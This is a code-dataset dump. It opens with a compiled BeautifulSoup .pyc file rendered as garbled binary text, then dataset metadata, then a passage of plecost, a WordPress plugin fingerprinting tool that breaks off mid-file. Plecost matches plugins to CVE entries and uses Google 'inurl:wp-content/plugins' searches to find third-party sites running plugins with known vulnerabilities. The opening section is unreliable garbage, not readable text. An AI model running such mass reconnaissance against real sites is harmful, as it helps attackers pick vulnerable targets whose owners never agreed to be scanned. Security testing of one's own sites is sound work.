RöR∏R(tlowert CHARSET_RERORRRRìRKRäR R RBRú(RR4t httpEquivt contentTypetcontentTypeIndexttagNeedsEncodingSubstitutionRWR≠RjRëR~tnewAttrt newCharsetR/((s!/pentest/plecost/BeautifulSoup.pyt start_meta"s@          N( RTRUsinputRWsmetaRYslinkR[sbaseR](sspanRbRcsobjectRessubRfscenter(RhsdivRjRksdel(saddressR{R;spre(R`RaRbR†R˙R R#R+R-R>tNESTABLE_INLINE_TAGStNESTABLE_BLOCK_TAGStNESTABLE_LIST_TAGStNESTABLE_TABLE_TAGStNON_NESTABLE_BLOCK_TAGSR5R4RRtMRÄRá(((s!/pentest/plecost/BeautifulSoup.pyRS∏s@.                R cBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR QstICantBelieveItsBeautifulSoupcBs2eZdZdZdZegeieeÉZRS(syThe BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. 
This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.temtbigRWtsmallttttabbrtacronymtstrongtcitetcodetdfntkbdtsamptvartbR|(RèRêRWRëRíRìRîsstrongRñscodeRòRôRösstrongRõRúRê(R`RaRbt*I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGSt)I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGSR˙RSR4(((s!/pentest/plecost/BeautifulSoup.pyRéTs t MinimalSoupcBs eZdZedÉZhZRS(sîThe MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.R|(R`RaRbR˙R5R4(((s!/pentest/plecost/BeautifulSoup.pyRüxs t BeautifulSOAPcBseZdZdÑZRS(sÀThis class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.cCsªt|iÉdjoî|id}|id}|iÉt|tÉo\t|iÉdjoFt|idtÉo/|ii|i É o|id||i <q™nt i |ÉdS(Niiˇˇˇˇi˛ˇˇˇi( R(R%R´R$RLRR&R∑R∞R3R˚R(RR/R ((s!/pentest/plecost/BeautifulSoup.pyRôs   &(R`RaRbR(((s!/pentest/plecost/BeautifulSoup.pyR†ÖstRobustXMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR°¨stRobustHTMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR¢ÆstRobustWackAssHTMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR£∞stRobustInsanelyWackAssHTMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR§≤stSimplifyingSOAPParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR•¥sRcBsbeZdZhdd6dd6ZgdedÑZdÑZdÑZd ÑZed ÑZ d ÑZ d ÑZ dfZ d ÑZh dgd6dd6dhd6did6djd6dkd6dld!6dmd$6dnd'6dod*6dpd-6dqd06drd36d4d56dsd86d4d96d4d:6dtd=6dud@6dvdC6dwdF6dxdI6dydL6dzdO6d{dR6d|dU6d}dX6d~d[6dd^6d4d_6dÄdb6dÅde6ZRS(ÇsœA class for detecting the encoding of a *ML document and converting it to a Unicode string. 
If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.s mac-romant macintoshs shift-jissx-sjisR˝c CsÄd|_|i||É\|_}}||_g|_|djpt|tÉod|_t|É|_dSd}x)|D]!}|i |É}|oPqÄqÄW|p6x3||fD]!}|i |É}|oPqπqπWn| o>t o7t|itÉ o#|i t i |iÉdÉ}n|p0x-dD]!} |i | É}|oPq6q6Wn||_|p d|_ndS(NRÃRZsutf-8s windows-1252(sutf-8s windows-1252( R Rt_detectEncodingRÔRttriedEncodingsR$R\Rt _convertFromtchardettdetect( RRÔtoverrideEncodingsRRtdocumentEncodingtsniffedEncodingtutproposedEncodingtproposed_encoding((s!/pentest/plecost/BeautifulSoup.pyR†„s>       ##  cCsZ|ii|É}t|tÉo4|idjod|d}qVd|d}n|S(sDChanges a MS smart quote character to an XML or HTML entity.R˝s&#x%s;is&%s;i(tMS_CHARSR¨R$ttupleR(RtorigRì((s!/pentest/plecost/BeautifulSoup.pyt _subMSChars cs“ài|É}| p|àijodSàii|Éài}àio;|iÉdjo(tidÉi áfdÜ|É}ny(ài ||É}|à_|à_ Wnt j o }dSXàiS(Ns windows-1252s iso-8859-1s iso-8859-2s([Ä-ü])csài|idÉÉS(i(RµRä(Râ(R(s!/pentest/plecost/BeautifulSoup.pyRñs(s windows-1252s iso-8859-1s iso-8859-2( t find_codecR®R R0RÔRRRRRìt _toUnicodeRRı(RtproposedRÔRØte((Rs!/pentest/plecost/BeautifulSoup.pyR©s$      c Cst|Édjo9|d djo(|dd!djod}|d}nºt|Édjo9|d djo(|dd!djod}|d}np|d d jod }|d}nK|d d jod }|d}n&|d d jod}|d}nt||É}|S(sGiven a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliasesiis˛ˇtsutf-16besˇ˛sutf-16leisÔªøsutf-8t˛ˇsutf-32besˇ˛sutf-32le(R(R\(RRDRZtnewdata((s!/pentest/plecost/BeautifulSoup.pyR∑,s&$$cCs*d$}}y[|d djo|i|É}n4|d djo"d}t|dÉidÉ}nt|ÉdjoK|d djo:|dd!djo&d}t|ddÉidÉ}n£|d d jo"d }t|d ÉidÉ}npt|ÉdjoK|d d jo:|dd!djo&d }t|dd ÉidÉ}n|d d jo"d }t|d ÉidÉ}nfl|d djo"d}t|dÉidÉ}n¨|d djo&d }t|dd ÉidÉ}nu|d djo&d}t|ddÉidÉ}n>|d djo&d}t|ddÉidÉ}nd}Wn d$}nXtidÉi|É}| o/|o(tidtiÉ}|i |É}n|d$j oL|i Édi É}|o ||_ n|o|d%jo |}qn|||fS(&s3Given a document, tries to detect its XML encoding.isLoßît<?sutf-16besutf-8is˛ˇR∫s<?sutf-16lesˇ˛t<sutf-32bes<sutf-32leRªsˇ˛isÔªøtasciis!^<\?.*encoding=['"](.*?)['"].*\?>s#<\s*meta[^>]+charset=([^>]*?)[;'">]isiso-10646-ucs-2sucs-2t csunicodesiso-10646-ucs-4sucs-4tcsucs4sutf-16sutf-32tutf_16tutf_32tutf16tu16N( siso-10646-ucs-2sucs-2R¿siso-10646-ucs-4sucs-4R¡sutf-16sutf-32sutf_16sutf_32sutf16su16( R t_ebcdic_to_asciiR\R]R(RRRëtIROtgroupsRR(Rtxml_dataRt xml_encodingtsniffed_xml_encodingtxml_encoding_matchtregexp((s!/pentest/plecost/BeautifulSoup.pyRßEsj $ $        cCsi|i|ii||ÉÉpJ|o|i|iddÉÉp'|o|i|iddÉÉp|S(Nt-RÃt_(t_codectCHARSET_ALIASESR¨RY(Rtcharset((s!/pentest/plecost/BeautifulSoup.pyR∂âs##cCsI|p|Sd}yti|É|}Wnttfj onX|S(N(R tcodecstlookupt LookupErrorR (RR“tcodec((s!/pentest/plecost/BeautifulSoup.pyR–ès  cCsx|i}|ipUd}ddk}|iditttdÉÉÉditt|ÉÉÉ|_n|i|iÉS(Niiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇiˇˇˇˇRÃi(iiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i 
ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇ( RotEBCDIC_TO_ASCII_MAPRmt maketransR•RùtchrR∏R)(RR_R‹temapRm((s!/pentest/plecost/BeautifulSoup.pyR∆ös.   =teurot20ACsÄRÕsÅtsbquot201AsÇtfnoft192sÉtbdquot201EsÑthellipt2026sÖtdaggert2020sÜtDaggert2021sátcirct2C6sàtpermilt2030sâtScaront160sätlsaquot2039sãtOEligt152såt?sçs#x17Dt17Dsésèsêtlsquot2018sëtrsquot2019sítldquot201Csìtrdquot201Dsîtbullt2022sïtndasht2013sñtmdasht2014sóttildet2DCsòttradet2122sôtscaront161sötrsaquot203Asõtoeligt153súsùs#x17Et17EsûtYumlRÃsüN(R€R‹(R›Rfi(RflR‡(R·R‚(R„R‰(RÂRÊ(RÁRË(RÈRÍ(RÎRÏ(RÌRÓ(RÔR(RÒRÚ(s#x17DRÙ(RıRˆ(R˜R¯(R˘R˙(R˚R¸(R˝R˛(RˇR(RR(RR(RR(RR(R R (R R (s#x17ER (RRÃ(R`RaRbR—RöR†RµR©R∑RßR∂R–R R◊R∆R≤(((s!/pentest/plecost/BeautifulSoup.pyR÷sZ  !   D    t__main__(?Rbt __future__Rt __author__t __version__t __copyright__t __license__tsgmllibRRR”t markupbasettypesRthtmlentitydefsRt ImportErrorR+t NameErrortsetsRRttagfindRët_declname_matchRhRRdR R\R&RtRuRwRxRLRJRRMR˙R˚RSRıR RéRüR†R°R¢R£R§R•R™R tcjkcodecs.aliasest cjkcodecst iconv_codecRR`tsyststdintsoupR€(((s!/pentest/plecost/BeautifulSoup.pyt<module>NsÇ       ˇ7#ˇñx ˇ∞ô$ ' ˇ  
67,544
Python
.py
489
134.490798
1,421
0.443139
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
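The author/version/license strings summarized in the record above are recoverable because a Python 2 .pyc is just an 8-byte header followed by a marshalled code object, and module docstrings and __version__-style constants sit in that object's constant pool. A minimal sketch of how such a file can be inspected (it assumes a CPython 2.x interpreter whose bytecode magic matches the file, and the helper name inspect_pyc is ours, not part of this repository):

import marshal
import struct

def inspect_pyc(path):
    # Python 2 .pyc layout: 4-byte magic, 4-byte source mtime, marshal data.
    f = open(path, 'rb')
    magic = f.read(4)                          # version-specific magic number
    mtime = struct.unpack('<I', f.read(4))[0]  # mtime of the source .py
    code = marshal.load(f)                     # fails if the interpreter's magic differs
    f.close()
    print 'compiled from %s (source mtime %d, magic %r)' % (
        code.co_filename, mtime, magic)
    # Docstring, author and version strings live in co_consts.
    for const in code.co_consts[:8]:
        print repr(const)[:120]

inspect_pyc('BeautifulSoup.pyc')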
18,915
plecost-0.2.2-9-beta.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/plecost-0.2.2-9-beta.py
#!/usr/bin/python
#
# Plecost: Wordpress finger printer tool.
#
# @url: http://iniqua.com/labs/
#
# @author:Francisco J. Gomez aka ffranz (http://iniqua.com/)
# @author:Daniel Garcia Garcia aka (http://iniqua.com/ - http://securitytoolslist.com)
#
# Code is licensed under -- GPLv3, http://www.gnu.org/licenses/gpl.html --
#
# DISCLAIMER:
#
#

import urllib
import urlparse
import urllib2
import re
import sys
import getopt
import threading
import random
import time
import os
import shelve
import cPickle as pickle

from httplib import HTTPException
from urllib2 import Request, urlopen, URLError
from urlparse import urlparse
from BeautifulSoup import BeautifulSoup
from xgoogle.search import GoogleSearch, SearchError
from threading import Thread

#
# General variables
#
WPCurrent_URL = "http://wordpress.org/download/"
WPlug_URL = "http://wordpress.org/extend/plugins/browse/popular/page/"
CVE_LIST = []
MinSleepTime = 10
MaxSleepTime = 20
ttl_cvelist = 604800
NumChecks = -1
WhithCVE = False
OutPutFile = "output.txt"
InputPluginList = ""
PluginList = ""
DisplayHelp = False
TargetURL = ""
ColoredOutput = False
NumThreats = 2
CVE_file = "CVE.dat"
verbose = True
limitForSearch = 99999

help = '''
////////////////////////////////////////////
// ..................................DMI...
// .............................:MMMM......
// .........................$MMMMM:........
// .........M.....,M,=NMMMMMMMMD...........
// ........MMN...MMMMMMMMMMMM,.............
// .......MMMMMMMMMMMMMMMMM~...............
// .......MMMMMMMMMMMMMMM..................
// ....?MMMMMMMMMMMMMMMN$I.................
// .?.MMMMMMMMMMMMMMMMMMMMMM...............
// .MMMMMMMMMMMMMMN........................
// 7MMMMMMMMMMMMMON$.......................
// ZMMMMMMMMMMMMMMMMMM.......plecost.......
// .:MMMMMMMZ~7MMMMMMMMMO..................
// ....~+:.................................
//
// Plecost - Wordpress finger printer Tool (with threads support) 0.2.2-9-beta
//
// Developed by:
// Francisco Jesus Gomez aka (ffranz@iniqua.com)
// Daniel Garcia Garcia (dani@iniqua.com)
//
// Info: http://iniqua.com/labs/
// Bug report: plecost@iniqua.com
'''

usage = '''
Usage: %s [options] [ URL | [-l num] -G]\r\n

Google search options:

    -l num  : Limit number of results for each plugin in google.
    -G      : Google search mode

Options:

    -n      : Number of plugins to use (Default all - more than 7000).
    -c      : Check plugins only with CVE associated.
    -R file : Reload plugin list. Use -n option to control the size (This takes several minutes)
    -o file : Output file. (Default "output.txt")
    -i file : Input plugin list. (Needed to start the program)
    -s time : Min sleep time between two probes. Time in seconds. (Default 10)
    -M time : Max sleep time between two probes. Time in seconds. (Default 20)
    -t num  : Number of threads. (Default 2)
    -h      : Display help.

(More info: http://iniqua.com/labs/)

Examples:

 * Reload first 5 plugins list:
   plecost -R plugins.txt -n 5
 * Search vulnerable sites for first 5 plugins:
   plecost -n 5 -G -i plugins.txt
 * Search plugins with 20 threads, sleep time between 12 and 30 seconds for www.example.com:
   plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example.com

''' % (sys.argv[0])

####################################################################################################################################################
#
# Functions and classes
#
####################################################################################################################################################

#
# Class for search CVE
#
class CVE(object):
    ''' CVE class to manage vulnerability info. '''

    def __init__(self):
        ''' Constructor '''

    def CVE_list(self, key_word):
        ''' Create an object file. Content: CVE entries [Id,Description].
        Search by keyword in wordpress. '''
        try:
            cve_file = file(CVE_file,"w")
        except IOError:
            print "No such file or directory"
        try:
            cve = urllib2.urlopen("http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword="+key_word).read()
        except URLError:
            print ""
        cve_tree = BeautifulSoup(cve)
        count = 0
        for ana in cve_tree.findAll('a'):
            if ana.parent.name == 'td':
                cve_link = ana["href"]
                if cve_link.find("/cgi-bin/cvename.cgi?name=") != -1:
                    count += 1
                    try:
                        page2 = urllib2.urlopen("http://cve.mitre.org" + cve_link).read()
                    except URLError:
                        print ""
                    soup2 = BeautifulSoup(page2)
                    for ana2 in soup2.findAll('th'):
                        if ana2.text == "Description":
                            CVE_LIST.append([cve_link.split('=')[1],ana2.findNext('td').text])
                            pickle.dump([cve_link.split('=')[1],ana2.findNext('td').text],cve_file,2)
        cve_file.close()

    def CVE_loadlist(self):
        ''' Load data from CVE.dat file to CVE_list[] '''
        try:
            cve_file = file(CVE_file)
        except IOError:
            print "No such file or directory"
        while True:
            try:
                cve_entry = pickle.load(cve_file)
            except EOFError:
                break
            CVE_LIST.append(cve_entry)
        cve_file.close()

    def CVE_search(self, plugin_name):
        ''' Search into CVE list. Return CVE ID list '''
        CVE_search_list = []
        search = plugin_name
        for sublist in CVE_LIST:
            if sublist[1].lower().find(search.lower()) != -1:
                CVE_search_list.append(sublist[0])
        return CVE_search_list

#
# Class for analyzing a website
#
class Wordpress(Thread):
    ''' Wordpress class. Handle info about plugins '''

    def __init__(self):
        self.all_run = []
        ''' Constructor '''

    def pluginlist_generate(self):
        ''' Create popular plugin list '''
        url_count = 1
        plugin_count = 0
        plugin_cve = CVE()
        if not os.path.isfile(CVE_file):
            plugin_cve.CVE_list("wordpress")
        stats = os.stat(CVE_file)
        if int(time.time()) - int(stats[8]) > ttl_cvelist :
            print ""
            print "- CVE file is too old. Reload now?[y/n]:",
            opt = sys.stdin.readline()
            if opt.strip() == "y":
                print ""
                print "- Really?[y/n]:",
                opt = sys.stdin.readline()
                if opt.strip() == "y":
                    print ""
                    print "- Reloading CVE list... be patient"
                    plugin_cve.CVE_list("wordpress")
            else:
                print "- Maybe later."
        plugin_cve.CVE_loadlist()
        try:
            wp_file = file(PluginList,"w")
        except IOError:
            print ""
            print "[!] Error opening file: \"" + PluginList + "\""
            print ""
            sys.exit(-1)
        final_countdown = 1
        end = 0
        tmpCount = 0
        while True:
            try:
                wpage = urllib2.urlopen(WPlug_URL+"/"+str(url_count)+"/").read()
            except URLError:
                print ""
                print "[!] Web site of plugin is not accessible."
                print ""
                sys.exit(-1)
            url_count += 1
            wpsoup = BeautifulSoup(wpage)
            if str(wpsoup).find('plugin-block') == -1:
                print "Wordpress plugin list end:"
                break
            for ana in wpsoup.findAll('a'):
                plugin_url = ana["href"]
                if plugin_url.find("wordpress.org/extend/plugins/") != -1 and plugin_url.find("popular") == -1 and plugin_url.find("tags") == -1 and plugin_url.find("google.com") == -1 and plugin_url.find(".php") == -1:
                    plugin_count += 1
                    if (plugin_url.split('/')[5] != '' ):
                        name = plugin_url.split('/')[5]
                        if len(ana.findNext('li').contents) == 2:
                            version = ana.findNext('li').contents[1]
                            if name != "tac":
                                cves = plugin_cve.CVE_search(plugin_url.split('/')[5])
                                cves_l = ""
                                for l in cves:
                                    cve_a = l+";"
                                    cves_l = cves_l + cve_a
                                # Decode only byte strings; calling unicode() on an
                                # already-unicode value would raise TypeError.
                                if not isinstance(version, unicode):
                                    version = unicode(version, errors='replace')
                                u_version = version.encode('utf-8')
                                try:
                                    wp_file.write(name+","+u_version+","+cves_l+"\n")
                                except Exception:
                                    pass
                                if int(NumChecks) != -1 and (plugin_count - 1) == int(NumChecks):
                                    end = 1
                                    break
            if end == 1:
                break
            if tmpCount == 1:
                print plugin_count,
                print " plugins stored. Last plugin processed: " + name
                sys.stdout.flush()
                tmpCount = 0
            else:
                tmpCount+=1
        wp_file.close()

    # Private call for each URL. This method has the main code to check the URL.
    def check_url(self,url):
        ''' Check Wordpress and plugin version. '''
        # try to open file output
        if OutPutFile != None:
            try:
                fileoutput = open(OutPutFile,"w")
            except IOError:
                print ""
                print "[!] Error while opening output file."
                print ""
                sys.exit(-1)
        readmeok = False
        # Check WordPress version
        try:
            filetmp = "\nResults for: " + url + "\n\n"
            filetmp += " -------- \n"
            if url.find("http://") == -1:
                readme = urllib2.urlopen("http://"+url+"/readme.html")
            else:
                readme = urllib2.urlopen(url+"/readme.html")
            soupreadme = BeautifulSoup(readme)
            version = soupreadme.find('h1')
            location = str(version).find("Versi")
            print ""
            print "==> Results for: " + url + " <=="
            print ""
            print chr(27) + "[0;91m[i] Wordpress version found: ",
            filetmp += "\nWordpress version found: "
            if location != -1:
                print str(version)[(location + 8):(location + 14)].split("\n")[0]
                filetmp += str(version)[(location + 8):(location + 14)].split("\n")[0] + "\n"
                wpCurrentVersion = urllib2.urlopen(WPCurrent_URL)
                soupwpCurrentVersion = BeautifulSoup(wpCurrentVersion)
                versionwpCurrentVersion = soupwpCurrentVersion.find('div', attrs={'class': 'col-3'}).find('p', attrs={'class': 'download-meta'}).find('strong').contents[0].split(';')[2]
                print "[i] Wordpress last public version: "+str(versionwpCurrentVersion)
            else:
                print "Not result"
                filetmp += "Not result\n"
            filetmp += "\n\n"
            fileoutput.write(filetmp)
            print chr(27) + "[0;0m"
        except URLError:
            print ""
            print "[!] Can't open URL specified: \"" + url + "\""
            print ""
        try:
            plugin_list = open (InputPluginList,"r")
        except IOError:
            print ""
            print "[!] Error while opening the plugins list."
            print ""
            sys.exit(-1)
        # Search for each plugin
        final_countdown = 1
        print ""
        print "[*] Search for installed plugins"
        print ""
        # Lock for threads
        lock = threading.Lock()
        # Semaphore for write in order to screen
        self.screenSemaphore = threading.Semaphore(1)
        # Semaphore for simultaneous checks
        self.checkSimultaneus = threading.Semaphore(int(NumThreats)-1)
        # Semaphore for write in file
        self.writeFile = threading.Semaphore(int(NumThreats)-1)
        # catch keyboard interrupt
        try:
            for line in plugin_list:
                self.checkSimultaneus.acquire()
                cves = "-"
                try:
                    plugin, version, cves= line.split(",")
                except:
                    continue
                # Create thread
                t = threading.Thread(target=self.__siteSearch, args=(url,plugin,cves,version,fileoutput,cves,))
                self.all_run.append(t)
                # run thread
                self.all_run[len(self.all_run)-1].start()
                final_countdown += 1
                if int(NumChecks) != -1 and final_countdown == int(NumChecks):
                    break
        except KeyboardInterrupt:
            sys.exit(-1)
        plugin_list.close()
        fileoutput.close()
        print "[*] Done"
        return 0

    # Main code: searches info for each URL
    def __siteSearch(self,url,plugin,cve,version,fileoutput,cves):
        if url.find("http://") == -1:
            url_readme = "http://"+url+"/wp-content/plugins/"+plugin+"/readme.txt"
        else:
            url_readme = url+"/wp-content/plugins/"+plugin+"/readme.txt"
        try:
            try:
                data = urllib.urlopen(url_readme).read()
            except IOError:
                return
            readme_found = data.find("== Description ==")
            location = data.find("Stable tag:")
            # check if README.txt exists
            if readme_found == -1:
                if url.find("http://") == -1:
                    url_readme = "http://"+url+"/wp-content/plugins/"+plugin+"/README.txt"
                else:
                    url_readme = url+"/wp-content/plugins/"+plugin+"/README.txt"
                try:
                    data = urllib.urlopen(url_readme).read()
                except IOError:
                    return
                readme_found = data.find("== Description ==")
                location = data.find("Stable tag:")
            printToScreen = ""
            if readme_found != -1:
                # screen results
                printToScreen += "\n"
                printToScreen += chr(27)+ "[0;92m"+"[i] Plugin found: " + plugin + "\n"
                printToScreen += chr(27)+ "[0;94m"+" |_Latest version: " + version + "\n"
                # File results
                filetmp = "\n"
                filetmp += "Plugin found: " + plugin + "\n"
                filetmp += "|_Latest version: " + version + "\n"
                if location != -1:
                    printToScreen += chr(27)+"[0;91m"+" |_ Installed version: " + data[(location + 12):(location + 17)].split("\r")[0] + "\n"
                    filetmp += "|_ Installed version: " + data[(location + 12):(location + 17)].split("\r")[0] + "\n"
                else:
                    printToScreen += " |_Installed version: No results" + "\n"
                    filetmp += "|_Installed version: No results" + "\n"
                filetmp += "\n"
                # Write results on file
                self.writeFile.acquire()
                fileoutput.write(filetmp)
                fileoutput.flush()
                self.writeFile.release()
                if cves != None and cves != "-" and cves != "\n":
                    printToScreen += chr(27)+"[0;91m"+" |_CVE list: \n"
                    for i in cves.split(";"):
                        if i!="\n":
                            printToScreen += chr(27)+"[0;91m"+" |___" + i + ": (http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + i + ")\n"
                printToScreen += chr(27)+ "[0m"
                self.screenSemaphore.acquire() # lock screen console
                print printToScreen,
                self.screenSemaphore.release() # release screen console
            # Release for new thread
            self.checkSimultaneus.release()
        except KeyboardInterrupt:
            raise KeyboardInterrupt
        return

#
# Class for search on google
#
class gsearch(Thread):
    # Attributes
    filename = None
    plugins = None
    file = None
    outfilename = None
    outfile = None
    sites = None
    #
    # Results array format
    #
    # [0] = Hostname
    # [1] = Plugin
    # [2] = Latest version
    # [3] = Version installed
    # [4] = CVE
    # [5] = Exploit (for future use)
    results = None

    # Default constructor
    def __init__(self, filename, outfilename):
        self.filename = filename
        self.outfilename = outfilename
        self.plugins = []
        self.sites = {}
        self.results = []

    # Open input and output file
    def openFiles(self):
        list = self.plugins
        try:
            self.file = open(self.filename,"r")
        except IOError:
            print ""
            print "[!] Error while reading the plugins file."
            print ""
            sys.exit(-1)
        try:
            self.outfile = open(self.outfilename, "w+")
        except IOError:
            print ""
            print "[!] Error while opening output file"
            print ""
            sys.exit(-1)

    # Read next plugin
    def readNextPlugin(self):
        return self.file.readline()

    # Search README.txt
    def searchReadme(self,site,plugin,cap):
        # Make complete URL
        if cap == "nocap":
            url = "http://" + site + "/wp-content/plugins/" + plugin + "/readme.txt"
        else:
            url = "http://" + site + "/wp-content/plugins/" + plugin + "/README.txt"
        # Open site
        res = None
        try:
            req = Request(url.encode('utf8'))
            res = urlopen(req)
            data = res.read()
        # Close connection
        except URLError:
            return ""
        except ValueError:
            return ""
        except HTTPException:
            return ""
        return data

    # Search plugin version in text
    def getVersion(self,text):
        if text.find("== Description ==") != -1:
            location = text.lower().find("stable tag:")
            if location != -1:
                return text[(location + 12):(location + 17)].split("\r")[0]
        return "Not result"

    # Write file output
    def writeOutput(self,results):
        if results == None:
            return
        for i in results:
            tmp = ""
            for j in i:
                rep = j.replace("\n","")
                tmp = tmp + rep + ","
            tmp=tmp + "\n"
            self.outfile.write(tmp)
            self.outfile.flush()

    # Get the google results
    def getGoogleResults(self,pluginname,latest,cve):
        try:
            gs = GoogleSearch("inurl:'wp-content/plugins/" + pluginname + "'", random_agent=True)
            gs.results_per_page = 100
            numberOfprocessed = 0
            self.all_run = []
            for i in range(int(limitForSearch)):
                results = gs.get_results()
                if not results:
                    break
                # Semaphore for simultaneous checks
                self.checkSimultaneus = threading.Semaphore(int(NumThreats))
                # Semaphore for write to file
                self.writeFile = threading.Semaphore(int(NumThreats)-1)
                for res in results:
                    self.checkSimultaneus.acquire()
                    host_name = urlparse(res.url.encode()).hostname
                    # Create thread
                    t = threading.Thread(target=self.__getGoogleResults, args=(host_name,latest,pluginname,cve))
                    self.all_run.append(t)
                    # run thread
                    self.all_run[len(self.all_run)-1].start()
        except SearchError, e:
            print "Search failed: %s" % e

    # Private search for each thread
    def __getGoogleResults(self,host_name,latest,pluginname,cve):
        version = ""
        version2 = ""
        results = []
        if host_name:
            readme = self.searchReadme(host_name, pluginname, cap="nocap")
            if readme:
                version = self.getVersion(readme)
            if version == "Not result" or version == "":
                readme = self.searchReadme(host_name, pluginname, cap="cap")
                if readme:
                    version2 = self.getVersion(readme)
                    if verbose == True :
                        print " - Site: " + host_name + " || Plugin: " + pluginname + "|| Only cached by Google"
                    results.append([host_name,pluginname,"Only cached by Google",latest,version2.strip(),cve])
            else:
                if verbose == True:
                    print " - Site: " + host_name + " || Plugin: " + pluginname + "|| Yet installed on site"
                results.append([host_name,pluginname,"Yet installed on site",latest,version.strip(),cve])
        # write results to file
        self.writeFile.acquire()
        self.writeOutput(results)
        self.writeFile.release()
        del results
        self.checkSimultaneus.release()

    # Main method
    def Run(self):
        # Open the files
        self.openFiles()
        # List the results
        final_countdown = 1
        equalversion = 0
        nequalversion = 0
        totalplugins = 0
        while True:
            readed=(self.readNextPlugin())
            if not readed:
                break
            try:
                plugin,latestversion,cves=readed.split(",")
            except:
                continue
            # Check whether to skip plugins without an associated CVE
            if WhithCVE == True:
                continue
            # search
            self.getGoogleResults(plugin,latestversion,cves)
            # Sleep for few seconds
            timeToSleep=random.randint(MinSleepTime,MaxSleepTime)
            print ""
            print " **** Sleep " + str(timeToSleep) + " seconds..."
            print ""
            time.sleep(timeToSleep)
            final_countdown += 1
            if int(NumChecks) != -1 and final_countdown == int(NumChecks):
                break
        totalplugins = final_countdown
        self.outfile.close()

def reload_pluginlist():
    wordpress = Wordpress()
    wordpress.pluginlist_generate()

####################################################################################################################################################
#
# Begin of program
#
####################################################################################################################################################

try:
    opt, args = getopt.getopt(sys.argv[1:], "l:Gi:t:s:M:R:ho:cn:C",['google-search','input-file=','threads=','min-sleep-time=','max-sleep-time=','reload-plugin','help','output-file=','colored','try-num','without-cve'])
    options=dict(opt)
except getopt.GetoptError, err:
    if err.opt == "R":
        print ""
        print "[!] You must specify an output file for the \"-R\" parameter."
        print ""
    if err.opt == "i":
        print ""
        print "[!] You must specify an input plugins file for the \"-i\" parameter."
        print ""
    if err.opt == "o":
        print ""
        print "[!] You must specify an output file for the \"-o\" parameter."
        print ""
    if err.opt == "s":
        print ""
        print "[!] You must specify a minimum sleep time for the \"-s\" parameter."
        print ""
    if err.opt == "M":
        print ""
